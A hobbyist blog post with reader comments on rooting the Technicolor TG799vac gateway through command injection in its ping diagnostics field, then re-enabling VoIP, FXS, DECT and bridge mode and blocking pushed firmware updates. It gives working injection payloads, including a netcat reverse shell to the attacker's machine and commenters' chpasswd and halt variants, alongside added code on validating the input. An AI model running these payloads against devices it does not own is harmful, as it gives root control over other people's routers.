Hacking the Technicolor TG799vac (and unlocking features!)

The TG799vac, known more commonly in Australia as the “Telstra Gateway Max”, is a very capable piece of equipment. It has 802.11ac Wi-Fi, a VDSL2 / ADSL2+ modem (meaning NBN FTTN compatibility), a DECT base station, 2 x FXS ports for analogue handsets, and an FXO port.

They are supplied directly to Telstra, and as such carry Telstra-branded firmware. There is no ‘generic’ firmware available that simply gives you full access to the modem the way a retail device would. Personally, I think this kind of sucks: if you decide to use the device with anyone other than Telstra, you lose access to the VoIP functionality, the DECT base station and the FXO port. That was the motivation to crack into this device and re-enable as many features as possible.

By default, the IP address of the modem will be 10.0.0.138. In this example, I use a desktop on 10.0.0.122.

First, we have to exploit the web interface to get root access to the device. The flaw is in the IPv6 address validation of the Ping & Traceroute diagnostics page: the address you enter is passed to a shell command on the modem after only a superficial check, so a string that starts with something IPv6-looking and continues with a `;` and a command of your choice gets that command executed with the web server's privileges, which on this firmware means root. Everything else in this write-up depends on that shell.

Getting root access

On your desktop, open a listening port for the modem to connect back to. Make sure your desktop firewall allows inbound connections on it; the modem has to be able to reach 10.0.0.122:10001.
# nc -lvvp 10001

Now visit the ‘Diagnostics’ page on the modem and click on the Ping & Traceroute tab. In the IP address field, enter:
:::::::;nc 10.0.0.122 10001 -e /bin/sh

Anything after the `;` is just a shell command run as root, so if the modem's nc lacks the -e option (readers report this on older firmware) you can instead inject commands that start dropbear and set the root password directly; see the comments below.

If your modem doesn’t display the Diagnostics tile, use Firebug or your browser's built-in DOM inspector (F12 in Internet Explorer) on the main page of the modem GUI with all the “tiles” on it, and change one of the existing tiles (such as “Management”) so that it opens the diagnostics modal instead.

Change..
<div class="settings" id="Management" data-remote="modals/usermgr-modal.lp" data-toggle="modal" data-id="usermgr-modal"></div>

To..
<div class="settings" id="Diagnostics" data-remote="modals/diagnostics-xdsl-modal.lp" data-toggle="modal" data-id="diagnostics-xdsl-modal"></div>

Exit the DOM inspector and click on the “Management” tile as if you were entering the Management page. It should load the Diagnostics page instead.

If all goes well, your modem will now connect back to your desktop and the nc listener becomes a root shell. NOTE: at this point you won’t see any prompt or error messages, so while you’ll get the output of commands, it can get a little confusing. Type one command per line and wait for its output before typing the next.
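To make the flaw concrete, here is an added example in Python (my code, not anything from the post or from the firmware). It contrasts a hypothetical naive check that only inspects the leading run of hex digits and colons, standing in for whatever the firmware's validation actually did, with whole-string validation via the standard library, and shows why a command string built from the input (the `ping6 -c 4` prefix is an assumed stand-in for whatever the diagnostics page runs) turns the `:::::::;...` payload into a second shell command, while an argv list run without a shell cannot. The sample inputs are constructed; the backtick variant is the one a commenter below used.

```python
import ipaddress

# Constructed sample inputs: the post's payload, a backtick variant from the
# comments, a legitimate IPv6 address and an IPv4 address.
PAYLOAD_NC = ":::::::;nc 10.0.0.122 10001 -e /bin/sh"
PAYLOAD_HALT = ":::::::`halt`"
GOOD_V6 = "2001:db8::1"
GOOD_V4 = "10.0.0.122"

HEX_OR_COLON = set("0123456789abcdefABCDEF:")


def naive_ipv6_check(addr: str) -> bool:
    """Hypothetical stand-in for the broken validation (the firmware's real code is
    not on the page): accept anything whose leading run of hex digits and colons
    contains at least two colons, and ignore whatever follows that run."""
    head = ""
    for ch in addr:
        if ch not in HEX_OR_COLON:
            break
        head += ch
    return head.count(":") >= 2


def strict_ipv6_check(addr: str) -> bool:
    """Whole-string validation: the standard library either parses a complete IPv6
    address or raises, so trailing shell metacharacters can never slip through."""
    try:
        ipaddress.IPv6Address(addr)
    except ValueError:
        return False
    return True


def vulnerable_command_line(addr: str) -> str:
    """How the injection arises: the address is spliced into a command string that
    is then handed to a shell, guarded only by the naive check. The 'ping6 -c 4'
    prefix is an assumption, not what the modem actually runs."""
    if not naive_ipv6_check(addr):
        raise ValueError("rejected by naive check")
    return f"ping6 -c 4 {addr}"  # imagine os.system()/shell=True on this string


def shell_command_count(cmdline: str) -> int:
    """Count how many simple commands a POSIX shell would run for cmdline.
    Simplified on purpose: only ';' and newlines outside quotes separate commands;
    real shells also honour '|', '&&', '||', '&', '$(...)' and backticks, so this
    undercounts rather than overcounts."""
    count, quote = 1, None
    for ch in cmdline:
        if quote:
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch in ";\n":
            count += 1
    return count


def safe_ping_argv(addr: str):
    """Hardened form: validate the whole string, then build an argv list meant for
    subprocess.run(argv) with no shell, so the address can only ever be one
    argument. Returns None for anything that is not an IPv6 address."""
    if not strict_ipv6_check(addr):
        return None
    return ["ping6", "-c", "4", addr]


if __name__ == "__main__":
    for addr in (PAYLOAD_NC, PAYLOAD_HALT, GOOD_V6, GOOD_V4):
        print(f"{addr!r:45} naive={naive_ipv6_check(addr)!s:5} strict={strict_ipv6_check(addr)}")
    print("shell commands run for the payload:", shell_command_count(vulnerable_command_line(PAYLOAD_NC)))
    print("hardened argv:", safe_ping_argv(GOOD_V6))
```

The two fixes are independent and you want both: strict validation rejects the payload outright, and building an argv list instead of a command string means that even an unexpected value can only ever be a single argument to ping6, never a second command.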

First steps: change the root password, and get dropbear (the SSH server) to run on boot. NOTE the lack of prompt, and note that the echo below replaces whatever was in /etc/rc.local:

passwd
Changing password for root
New password:
Retype password:
Password for root changed by root
echo 'dropbear &' > /etc/rc.local
reboot

You should now be able to SSH into your modem on the LAN IP with the username root and the password you set above. Pick a strong one: this is the root account of a device whose other side faces your ISP. If SSH answers but rejects the password, check /etc/config/dropbear, where enable, PasswordAuth and RootPasswordAuth all need to be on (see the comments below).

$ ssh root@10.0.0.138
root@10.0.0.138's password:
 
BusyBox v1.23.2 (2017-02-08 14:47:26 UTC) built-in shell (ash)
  _______              __           __              __
 |_     _|.-----.----.|  |--.-----.|__|.----.-----.|  |.-----.----.
   |   |  |  -__|  __||     |     ||  ||  __|  _  ||  ||  _  |   _|
   |___|  |_____|____||__|__|__|__||__||____|_____||__||_____|__|
                 N E X T   G E N E R A T I O N   G A T E W A Y
 --------------------------------------------------------------------
 NG GATEWAY SIGNATURE DRINK
 --------------------------------------------------------------------
  * 1 oz Vodka          Pour all ingredients into mixing
  * 1 oz Triple Sec     tin with ice, strain into glass.
  * 1 oz Orange juice
 --------------------------------------------------------------------
 
Product: vant-f_telstra
Release: Aqua (16.3)
Version: 16.3.7567-2521030-20170614084458-887a8c777ed8527277d7137ed9149816c889cf1d
 
 
Hash config:         887a8c777ed8527277d7137ed9149816c889cf1d
Hash openwrt:        ca2463af2522fc727150f23d6e85005112e8e8eb
Hash kernel:         b295f29cce441d87cef07373bfb07b546f720db3
Hash technicolor:    021884ac6200cd08635043046d33a717336a3554
Hash mindspeed:      91b6a7a4d703268d6023c3a58da3d33fc62e7ed8
Hash lte:            cf5c1319d7769c1b9e7721dfebcfe25e8cc1176f
Hash routing:        7b853f235ce96cd14f3abaebf9253c5ca7f72f7d
Hash custo:          85da3def73fee4e92f478d2b1afafdfc16235a81
Hash packages:       0f8aa1264d7a3bf6e4304f0f8ddfdabc4ddac7e4
 
Bootloader: 2.0.54
 
root@mygateway:~#

You’ll note straight away that the firmware is based on OpenWrt. This is always good, as it means that most OpenWrt configuration (the UCI files under /etc/config) applies directly to this modem.

Disable software updates

A reader has written to advise that the exploit we have used to get access to the modem is fixed in release 17.1. To prevent your modem from auto-upgrading, I suggest editing /etc/config/cwmpd (the TR-069 / CWMP client through which firmware is pushed) as follows: set upgradesmanaged to '0' and comment out the acs_url line so the client has no server to contact:

option upgradesmanaged '0'
#option acs_url 'https://xxxxxxxxxx'

I also recommend stopping and disabling the service. A reader reports that it came back after a reboot, which is why the ACS URL is commented out as well:

# /etc/init.d/cwmpd stop
# /etc/init.d/cwmpd disable
# /etc/init.d/cwmpdboot disable
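Both edits above and the /etc/config/dropbear change that readers describe in the comments are small changes to UCI files. The following added example (my code, not the post's or OpenWrt's) makes them line by line so that comments and unrelated options survive untouched and the commented-out ACS URL stays visible in the file. The cwmpd sample is constructed: only upgradesmanaged and acs_url are quoted in the post, the section name and the state option are assumed, and the URL is a placeholder. The dropbear sample is the 'before' side of the diff a reader posted below. On the modem you would read and write the real files under /etc/config; this runs on the inline samples so it can be tried offline.

```python
import re
import shlex

# Constructed sample of /etc/config/cwmpd. Only upgradesmanaged and acs_url are
# quoted in the post; the section header and 'state' are assumed, and the URL is
# the post's own placeholder.
CWMPD_SAMPLE = """config cwmpd 'cwmpd_config'
        option state '1'
        option upgradesmanaged '1'
        option acs_url 'https://xxxxxxxxxx'
"""

# The 'before' side of the /etc/config/dropbear diff a reader posted in the comments.
DROPBEAR_SAMPLE = """config dropbear
        option enable '0'
        option PasswordAuth 'off'
        option RootPasswordAuth 'off'
        option Port '22'
#       option BannerFile '/etc/banner'
        option IdleTimeout '600'
"""

# An uncommented 'option' or 'list' line: indent, keyword, name, raw value.
OPTION_RE = re.compile(r"^(\s*)(option|list)\s+(\S+)\s+(.*\S)\s*$")


def get_option(text: str, name: str):
    """Value of the first uncommented 'option <name>' line, or None. A commented-out
    option therefore reads as absent, which matches how UCI treats it."""
    for line in text.splitlines():
        m = OPTION_RE.match(line)
        if m and m.group(2) == "option" and m.group(3) == name:
            return shlex.split(m.group(4))[0]
    return None


def edit_uci(text: str, changes: dict, comment_out=()) -> str:
    """Line-oriented edit of a UCI file. changes maps option name -> new value
    (appended at the end if the option is missing); comment_out names options or
    lists to disable by prefixing '#'. Assumes a single-section file, which holds
    for both files edited here; a multi-section file would need the section name."""
    out, seen = [], set()
    for line in text.splitlines():
        m = OPTION_RE.match(line)
        if m:
            indent, keyword, name, _ = m.groups()
            if name in comment_out:
                out.append("#" + line)
                continue
            if keyword == "option" and name in changes:
                out.append(f"{indent}option {name} '{changes[name]}'")
                seen.add(name)
                continue
        out.append(line)
    for name, value in changes.items():
        if name not in seen:
            out.append(f"        option {name} '{value}'")
    return "\n".join(out) + "\n"


def disable_cwmpd_upgrades(text: str) -> str:
    """The post's change: stop managed upgrades and remove the ACS URL so the CWMP
    client has nothing to talk to even if the service gets started again."""
    return edit_uci(text, {"upgradesmanaged": "0"}, comment_out=("acs_url",))


def enable_root_ssh(text: str) -> str:
    """The dropbear change from the comments: start the daemon and allow root
    password login. Combine with a strong root password, since that password is
    then the only thing guarding a root login."""
    return edit_uci(text, {"enable": "1", "PasswordAuth": "on", "RootPasswordAuth": "on"})


if __name__ == "__main__":
    print(disable_cwmpd_upgrades(CWMPD_SAMPLE))
    print(enable_root_ssh(DROPBEAR_SAMPLE))
```

Commenting the line out rather than deleting it keeps the original ACS URL recoverable in the file, which matters if you ever want to hand the device back to the ISP's management.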

Using bridge mode with dedicated PPPoE ethernet port

I use the AP on the device on my LAN, but I also use the modem purely in bridge mode, which means I want to dedicate a port to my router so that it can do PPPoE to my ISP. Thankfully, standard OpenWrt configuration applies. In /etc/config/network I added a new bridge called ‘adsl_wan’ containing eth4, eth3, atm_8_35 and ptm0 (the ATM and PTM interfaces are the ADSL and VDSL sides of the DSL modem respectively):

config interface 'adsl_wan'
        option type 'bridge'
        option ip6hint '0'
        option force_link '0'
        list ifname 'eth4'
        list ifname 'eth3'
        list ifname 'atm_8_35'
        list ifname 'ptm0'

You’ll need to remove eth3 from the LAN bridge first, otherwise it would be a member of both. eth4 is the WAN ethernet port and eth3 is the port right next to it; eth3 now sits on the same bridge as the VDSL/ADSL modem, so a router plugged into it can run PPPoE straight to the ISP. I have yet to figure out how to get the WAN port itself to do this, as it seems to be configured differently, maybe at the switch level.

Enable web interface features

If you have the modem in bridge mode, the web interface is gutted compared to routed mode: most of the configuration ‘cards’ are hidden.

Edit /www/lua/cards_limiter.lua and change the following function so that it never limits a card. Note that Lua comments start with --, and that a return cannot be followed by further statements in the same block, which is why the early return is wrapped in do ... end:

function M.card_limited(info, cardname)
  -- Display all cards, bridged or not. Lua only allows 'return' as the last
  -- statement of a block, so it is wrapped in 'do ... end' to leave the original
  -- check below in place. Delete this one line to restore the stock behaviour.
  do return false end

  if info.bridged then
    return not bridge_limit_list[cardname]
  end
  return false
end

Restart the web interface via /etc/init.d/nginx restart. If the web UI then stops accepting your password (a reader saw this on 15.3 firmware), SSH back in and take the added line out again.

Configure a third party SIP provider

Edit /etc/config/mmpbxrvsipnet and use the following guide.

Under the heading sip_net, set:

  • primary_registrar to your SIP server, e.g. my.sipserver.com
  • primary_registrar_port to 5060
  • primary_proxy to your SIP server, e.g. my.sipserver.com
  • primary_proxy_port to 5060

Use the hostname your provider gives you rather than its IP address (a reader in the comments found registration only worked with the FQDN).

Under the heading sip_profile_0, set:

  • user_name to your SIP username
  • uri to your SIP username
  • password to your SIP password
  • enabled to 1

Restart the mmpbxd service via /etc/init.d/mmpbxd restart.

If you have multiple SIP accounts to log into, with different providers, you can duplicate the entire sip_net section under a different name and configure it as above. Then set the profile's network setting to point to the new section you have created.

Enable the FXS ports

To enable the FXS ports, set the relay_state parameter to ‘1’ in /etc/config/mmpbxbrcmfxsdev, e.g. for the device with fxs_port '2':

config device 'fxs_dev_0'
        option user_friendly_name 'Phone 1'
        option comfort_noise 'silence'
        option echo_cancellation '1'
        option fax_transport 'inband_renegotiation'
        option t38_redundancy '1'
        option rtcp_interval '5000'
        #list codec_black_list 'G722'
        #list codec_black_list 'AMR-WB'
        option cw_cas_delay '758'
        option fxs_privacy_reason 'P'
        option fxs_unavailability_reason 'O'
        option fxs_port '2'
        option cid_display_date_enabled '1'
        option cid_display_calling_line_enabled '1'
        option cid_display_calling_party_name_enabled '1'
        option pos '0'
        option early_detect_faxmodem '0'
        option relay_state '1'


SIP call routing

Each DECT device or FXS port can be registered against one or more SIP accounts. Look for the incoming_map section for sip_profile_0 and edit as needed. This is my setup, which routes sip_profile_1 to the first registered DECT device and FXS port 1:

config incoming_map
        option profile 'sip_profile_0'
        list device 'fxs_dev_0'
        list device 'dect_dev_1'
        list device 'dect_dev_2'
        list device 'dect_dev_3'
        list device 'dect_dev_4'
        list device 'dect_dev_5'
        list device 'sip_dev_0'
        list device 'sip_dev_1'
        list device 'sip_dev_2'
        list device 'sip_dev_3'
        list device 'sip_dev_4'
        list device 'sip_dev_5'
        list device 'sip_dev_6'

config incoming_map
        option profile 'sip_profile_1'
        list device 'dect_dev_0'
        list device 'fxs_dev_1'


Registering DECT handsets

After enabling all the ‘cards’ in the web interface, the easy way is to start DECT pairing from there. Click on the Telephony card, then ‘Start’ the pairing and follow the instructions for your handset. This was straightforward for me.

Speeding up sync times

If you are on an NBN FTTN connection, the modem still seems to try to sync using the ADSL modes first. NBN FTTN uses VDSL2 profile 17a, so we can disable the other modes and profiles in /etc/config/xdsl (the commented-out lines are the ones removed from the default):

config xdsl 'dsl0'
        #list multimode 'gdmt'
        #list multimode 'adsl2annexm'
        #list multimode 'adsl2plus'
        list multimode 'vdsl2'
        #list profile '8a'
        #list profile '8b'
        #list profile '8c'
        #list profile '8d'
        #list profile '12a'
        #list profile '12b'
        list profile '17a'
        option enabled '1'
        option eoc_vendor_id 'BETMMB'
        option handshake_switch_timeout '0'
        option demod_cap_value '0x90447a'
        option demod_cap_mask '0x90447a'
        option demod_cap2_value '0x790000'
        option demod_cap2_mask '0x790000'
        option aux_features_value '0x1064003'
        option aux_features_mask '0x1064003'
        option vdsl_cfg_flags_value '0x1200e00'
        option vdsl_cfg_flags_mask '0x1200000'
        option xdsl_cfg1_value '0x0'
        option xdsl_cfg1_mask '0x0'
        option xdsl_cfg2_value '0x0'
        option xdsl_cfg2_mask '0x0'
        option maxaggrdatarate '160000'
        option maxdsdatarate '110000'
        option maxusdatarate '40000'
        option eoc_serial_number 'YeahRight 799vac 16.3'

    

Changing max sync speeds

In /etc/config/xdsl you can change the maximum sync rates (the values above are in kbit/s): maxusdatarate caps the upstream sync speed, maxdsdatarate the downstream, and maxaggrdatarate the combined total. The defaults are listed above. This doesn’t lift any limitation imposed by line length or at the DSLAM.

Update history

2017-09-02 – Initial revision of this document.
2017-09-07 – Add section to disable cwmpd to prevent pushed firmware updates locking us out.
2017-10-20 – Add workaround for diagnostics tile thanks to NetSicK

33 comments

• TeddyRaspin on September 4, 2017 at 5:22 pm

Do you know how to disable this hack and turn the modem back to its default status please?

  1. A standard factory reset should restore everything.

     While the changes survive a reboot, they should not survive the factory reset.

• TeddyRaspin on September 5, 2017 at 1:54 am

Anyway, on the DGA4130 (Technicolor AGTEF) SSH is enabled but using WinSCP or PuTTY I always get “access denied”. It seems that even if it says “password for root changed by root” and I enabled dropbear (the SSH server) via the echo ‘dropbear &’ > /etc/rc.local command, after the reboot process SSH is enabled but it seems not to accept the root password I entered before, and I don’t know why.

Maybe my Technicolor modem requires more hacking tweaks. Could you help me please?

  1. You might need to edit the file /etc/config/dropbear and allow it to use password auth.

     Mine looks like:

     config dropbear
             option enable '1'
             option PasswordAuth 'on'
             option RootPasswordAuth 'on'
             option Port         '22'
             option IdleTimeout '600'
     #       option BannerFile   '/etc/banner'

     • Dale on October 5, 2017 at 3:53 pm

     Also works on TG797n v3 (16.1), but instead of:
     echo ‘dropbear &’ > /etc/rc.local

     to enable dropbear I had to edit the file /etc/config/dropbear, thank you.
     To do that I used the sed command to edit line 2, and then lines 3 & 4:
     sed -i '2 s/0/1/' /etc/config/dropbear
     sed -i '3,4 s/off/on/g' /etc/config/dropbear
     cat /etc/config/dropbear

• Brian on September 7, 2017 at 10:37 pm

Thanks for this… Pity they fixed the exploit in the web pages in 17.1, but it seems I got to mine before any push happened.

Stopped and disabled the update service, but it reappeared after reboot, so I mashed out the update URL with hashes like suggested:
#option acs_url ‘https://################################’

  1. I’m not sure there are any Telstra type modems with 17.1 firmware as yet. Of course, other countries may have a different story…

  • Greg on October 7, 2017 at 10:57 am

  The exploit comes from weaponizedautism.wordpress.com. He said he’d release more unlocking techniques if Technicolor fixes this one. Maybe leave a comment there somehow. I can’t find anywhere to comment.

1. Can I also add, just for the sake of the search engines, that most of this also applies to the iiNet / Internode issued TG-789 VDSL modems?

   Can I also note that on the TG-789 at least you can enable dropbear SSH by editing the /etc/config/dropbear file instead of adding to the /etc/rc.local file.

      *** dropbear.orig 2017-09-08 09:40:16.532696000 +1000
      — dropbear 2017-09-08 09:41:10.828503662 +1000
      ***************
      *** 1,7 ****
      config dropbear
      ! option enable ‘0’
      ! option PasswordAuth ‘off’
      ! option RootPasswordAuth ‘off’
      option Port ’22’
      # option BannerFile ‘/etc/banner’
      option IdleTimeout ‘600’
      — 1,7 —-
      config dropbear
      ! option enable ‘1’
      ! option PasswordAuth ‘on’
      ! option RootPasswordAuth ‘on’
      option Port ’22’
      # option BannerFile ‘/etc/banner’
      option IdleTimeout ‘600’
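Review bot: the three `!` lines switch the daemon on and allow root password logins while the surrounding context keeps `option Port '22'` and adds no interface restriction, so once this is applied the root password is the only control on an SSH login to the device; apply it together with the post's `passwd` step and confirm separately which interfaces dropbear ends up listening on.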

• TeddyRaspin on September 10, 2017 at 7:58 pm

It would be nice if someone found a new exploit on 17.1 to enable root access. My modem is now fixed. 🙁

• TeddyRaspin on September 15, 2017 at 9:03 pm

Is there anyone who knows how to switch from bank_2 to bank_1?

My modem does not have telnet or ssh access. 🙁

  • MrMatthewM on October 9, 2017 at 12:11 am

  If you do a factory reset it may switch back to bank_1, a failsafe for a failed firmware update.

  I have not exactly confirmed this as 100%, but I was watching the console after the update from 15.1 to 16.3: it had upgraded but I had lost access to the web interface (I got Internal server error). This may have been a failed firmware update, but watching the console it was booting, so I held down the reset button for 10 seconds and after reboot it booted from bank_1 again and redid the firmware update to 16.3.
• John Doe on September 25, 2017 at 9:25 pm

It also works on TG789VAC V2 (16.3).

Do the /etc/shadow and /etc/config/dropbear changes survive a firmware upgrade through CWMP, or are the files overwritten?

  1. I believe they would get overwritten.

• Brian on September 29, 2017 at 10:38 am

Anyone know if this works on the TG800VAC?

I can get the executed code to open a shell (it's saying connected), but it's immediately dropping back to the host prompt, not staying connected (I think). Any chance the TG800 is immediately dropping the session?

  • Darren on September 29, 2017 at 11:13 pm

  I was able to perform the exploit on my TG800 no different from my TG799.

• notmyname on September 29, 2017 at 4:04 pm

The netcat connection didn't work for me.
These steps did work for me:
1. use this: :::::::;echo 'dropbear &' > /etc/rc.local to enable ssh through traceroute
2. ssh root@10.0.0.138
3. (the hard part) had to brute force the password (jks, the password is root)

  • Frank on September 30, 2017 at 1:31 pm

  Excuse my ignorance, but I'm not that savvy with these things. Downloaded netcat and couldn't get it to work. Any chance of expanding on the steps and simplifying in plain simple terms what you actually did?

  • MrMatthewM on October 2, 2017 at 4:49 pm

  What firmware are you running? Still 16.3 or 17.1?

  I have been wondering if it would be possible for routers that have been upgraded to 17.1 to do a hard reset so the modem switches back to bank 1, then log in via ssh, manually switch to bank 2, enable ssh on the 17.1 file system, then switch back.

• Chipsteroo on October 7, 2017 at 12:30 pm

I had no luck with nc, because on 14.1 the nc command doesn't support the -e option.

I ended up getting shell access using

:::::::;dropbear &
:::::::;echo 'root:x' | chpasswd

Then ssh into the router as root with password = x.

• matt on October 7, 2017 at 7:20 pm

A couple of notes from my recent attempts to do this:

On a Mac running OS X 10.10 (Yosemite), the command to get netcat to listen is:

/usr/bin/nc -l 10001

Also might be worth noting that editing once logged into the modem requires the vi command (and knowing how to use vi), which isn't explicitly stated in the tutorial above, e.g.:

vi /www/lua/cards_limiter.lua

My modem is still running v15.3 firmware, which greets you at the remote login with warnings about being prerelease and not for deployment. The change to enable all the cards in bridged mode locks you out of the web admin: the password is no longer accepted. SSHing back in and commenting out or removing that first added “return false” line returns the ability to log in.

I'm not sure how much info Bridged Mode removed in later firmware, but on 15.3 it appears to be a fairly complete Advanced Settings version (with no simple mode option). Obviously a number of services are disabled, but going back to Routed Mode requires a factory reset, which I assume will wipe all the changes made?

• Bogemon on October 26, 2017 at 11:12 am

Hello guys,

Just want to check if anyone has found anything on doing this on 17.1. Looks like the ping box won't allow me to send it; it gives a validation error now. Any other way to do this?

• Thisavros on October 29, 2017 at 1:04 pm

Thanks. SSH access worked for me.
Got the FXS port up with continuous dial tone.
Entered the sip_profile details and maps, but when attempting a call it fails after the second digit.
I note in the logs:
Sun Oct 29 11:48:10 2017 user.debug mmpbxd[7155]: [MMUCI] :E: mmUciCommonAllocateContext:248 – Error loading the UCI config from file for mmpbxbrcmsi3217x: UCI_ERR_NOTFOUND
Sun Oct 29 11:48:10 2017 user.debug mmpbxd[7155]: [MMBRCM] :E: mmBrcmSi3217xConfigLoad:1872 – No Slic configuration is found. Endpoint Driver default config will be used.
Sun Oct 29 11:48:10 2017 user.debug mmpbxd[7155]: [MMBRCM] :E: mmBrcmInit:590 – mmBrcmSi3217xConfigLoad has failed: MMPBX_ERROR_NOCONFIG

Have I missed a config file?

  • Thisavros on November 2, 2017 at 11:41 pm

  Hey guys, figured it out with some help from the AussieBB help desk.
  After successfully rooting the router TG800vac Build 16.3.7567-660-RD
  I followed the above guide. The exception being that silly me used the IP address for the proxy & registrar.

  After using the “case” sensitive FQDN, e.g.:
  Proxy Server: AussieBB.nms1.voice.wide.net.au
  Registrar Server: AussieBB.nms1.voice.wide.net.au
  Outbound Proxy: AussieBB.nms1.voice.wide.net.au
  Port: 5060
  VoIP is up and running.

  There are still many errors in the logs but I can make & receive calls.

  Thank you to CRCinAU

• Sacha Weatherstone on October 30, 2017 at 6:27 pm

I have the Technicolor TG789vac v2 HP running firmware v16.3 (MyRepublic). I have confirmed that the ping RCE exploit still works (:::::::`halt` halts the system). The router also has ssh enabled by default but the password is unknown, but the main issue I am having is that I cannot get netcat working. I have confirmed the modem can ping my host, but no netcat connection can ever be established. Any ideas?

  • Sacha Weatherstone on November 8, 2017 at 7:57 am

  Anyone got any ideas?

• Johnny on November 3, 2017 at 4:00 pm

Does anyone know how to disable Telstra Air? Can't seem to find any mention of it throughout the router directories.

  • Johnny on November 3, 2017 at 4:22 pm

  /etc/init.d/hotspotd stop

2. Hi, I'm not that strong in router configuration, but I got my ssh running and all is well.

   I want my TG799vac just to be a modem, nothing else. I have a Unifi USG gateway that will take care of all routing, firewall etc., but how do you get it into bridge mode? I made the adsl_wan as described but it doesn't seem to take effect. Am I missing something here? 🙂

• Will on November 5, 2017 at 10:36 pm

I have managed to apply the hack.

I am running the modem in bridged mode. How can I allow traffic on the modem to connect to the internet for SIP/LAN/etc.?

• Jatz on November 7, 2017 at 1:56 pm

If you apply this hack and set up a custom VoIP provider, can you use the Telstra T-Voice 502 handset with the non-Telstra VoIP?

  1. From what I understand, this is just a normal DECT phone, so it should work.

• Jens TC on November 13, 2017 at 12:21 am

Is it possible to install and use OpenVPN on the Technicolor, Release: Jade (16.2)?